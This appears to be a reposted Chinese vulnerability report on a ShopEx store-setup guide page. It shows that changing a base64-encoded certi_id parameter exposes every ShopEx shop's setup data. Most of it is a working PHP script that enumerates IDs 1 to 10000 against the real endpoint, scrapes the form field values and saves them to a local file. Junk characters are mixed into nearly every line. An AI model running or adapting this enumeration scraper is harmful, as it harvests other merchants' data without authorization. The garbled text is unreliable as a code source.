|
|
简要描述:! a4 m2 l) y* Z
ShopEx某接口缺陷,可遍历所有网站
+ |8 C" t$ j5 U( P详细说明:
3 J3 I+ Z4 X( v7 m, C& ?问题出现在shopex 网店使用向导页面
/ V# }/ r+ k9 d9 N' D7 t. D
" ]& R- x/ K( I( s$ \" x6 a- s! _' K. T9 d( z3 g9 g4 ] u& \0 w
, i* c# o0 r9 B+ |3 O& rhttp://guide.ecos.shopex.cn/step ... WlkaWFuLmNvbVwvIn0=
, R9 m- A( O `1 S" ^) A- S7 ^& R5 Y
! [& U5 T, [3 v) l( F: r/ r) _3 M
4 w o9 t; O5 x2 M; m& l
refer base64解密为 {"certi_id":'1051',"callback_url":"http:\/\/www.joyogame.net\/"}
( w: {' U( b; h7 f) d* e
; d# g8 k( x6 x$ H* ~) k' t- l% e% ]- P& o( b
% i; M2 y% o3 [+ s. N) e* b4 r
我们修改certi_id 即可遍历所有使用了ShopEx程序的网站
6 {! v8 _" K2 D& \! o j% p: f4 o& Z5 y/ h& ^6 e
, z* j% n( O8 o
* J7 ~4 y8 f" k' g+ P3 z0 ^8 e& I<?php
3 E2 N9 V2 B2 G8 t2 z8 E* }! w% s/ Z& V$ ~: O/ B6 \/ F, U
for ($i=1; $i < 10000; $i++) { //遍历; Y2 m! P' G- w4 f8 b! X" I* J3 ]
3 F! @$ g) \% r. t' z% \5 n3 M ShowshopExD($i);% S! j1 n8 U$ D! o
6 j9 K- k) H5 w: y. o3 E6 s3 p1 E
}/ i$ z' F4 W$ C* j
: P& V% t b( k( |# h4 E function ShowshopExD($cid) {1 u9 F# h6 [- r: O" c0 L6 c
% ?) d6 j; `1 e; p% X' R $url='http://guide.ecos.shopex.cn/step2.php';' \2 a% a( o* {; r* x
. n4 N+ {, A4 p8 @, f $refer = base64_encode('{"certi_id":'.intval($cid).',"callback_url":"http:\/\/www.a.com\/"}');
0 t, f; Q5 o( K3 n& K/ f# s/ }7 s5 {3 H v
$url = $url.'?refer='.$refer;! [# E( V4 a+ _0 F7 n3 _& r
& V0 Y, O' g8 j4 ^+ |/ q8 d
$ch = curl_init($url);2 P% c4 Y! C- d
: K7 t3 q6 y4 [; S
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true) ;
' C. y' X9 P- V5 Q) Y" F5 B' o
8 F/ Z. r5 G/ W' y+ K# `/ V curl_setopt($ch, CURLOPT_BINARYTRANSFER, true) ;" `6 w" s, k7 g4 a% w) u7 }5 Z
. ^ S7 ?! i0 {4 ?- ~* d; W
$result = curl_exec($ch);
6 r2 o- i2 _2 s# b
1 t+ d$ `3 R( L& {) c5 Q $result = mb_convert_encoding($result, "gb2312", "UTF-8");
9 c& j- e0 g* n& y/ T Z) o; Y/ |) r2 E8 V
if(strpos($result,$refer))$ \2 T. i- { z7 K9 K( |9 G7 P; A% `' k
4 M/ V4 w; Z3 c/ c4 n% L {4 S+ C& H( u7 q; i
& p' h$ R7 A; Z( A& Q$ J
$fp = fopen("c:/shopEx.txt",'ab'); //保存文件
5 p0 g" @. L$ c, O- V( c/ ~' D9 o+ V l% `
preg_match_all('/<input\stype="text"(.*?)\/>/',$result,$value);
: A: K& }3 [- X, d" c% U7 A" Y/ m/ _" Q9 J I
foreach ($value[1] as $key) {
: n2 H& i" C# x% ^$ `; Y5 D4 V4 x- Z% l: {' @2 y
preg_match_all('/name="(.*?)"(.*?)value="(.*?)"/',trim($key),$res);& O( I% z/ _$ a$ A6 @% i: v0 E* S
" v" I- ^: H L) @! L8 @( h6 {3 @
echo $res[1][0].':'.$res[3][0]."\r\n";% a) `: q) j( @2 z9 [
5 G, Z9 u' l. Y% I, a; [9 w
$col =$res[1][0].':'.$res[3][0]."\r\n";
: x8 G# B) r. z! n9 b5 b+ @0 W2 D
. y. ?$ x9 E$ S, y# ] fwrite($fp, $col, strlen($col));
$ E- j# ?9 R% r1 s& L6 }* F
/ H! N- r* W2 n \6 X/ v! z }/ q7 g0 ~5 B8 A1 g: V
0 a! a5 v# _9 @4 k) j
echo '--------------------------------'."\r\n";
7 T. M2 [7 h2 @- e% {7 @. o
' ^! y% {6 V0 ~. d fclose($fp); 1 v4 L2 |7 W0 |
4 \/ j: `( v& m }6 L: e- \: v, S8 H( v: L
8 B; N* R+ Q% {. R4 @' Z) d$ P
flush();+ J: R2 G; ]: F: |: n
3 l2 ]3 U$ R7 w
curl_close($ch);
" p' S2 U& P! }+ ^" [% M4 K1 c& y$ s6 q
}5 K# ^4 Z# ]6 {" P
- ]9 H. N7 Z2 ^- Z! @4 g+ W
?>
6 A( @# m2 V! |# Z; I+ V漏洞证明:* m. i5 W7 y# L( ]" w! Y. E
http://www.myhack58.com/Article/UploadPic/2013-9/201392110502740490.jpg
2 z" a; ~! M% H1 T% I: Orefer换成其他加密方式 F6 h2 W7 m& M5 j: ~6 b& u: D% v
|
|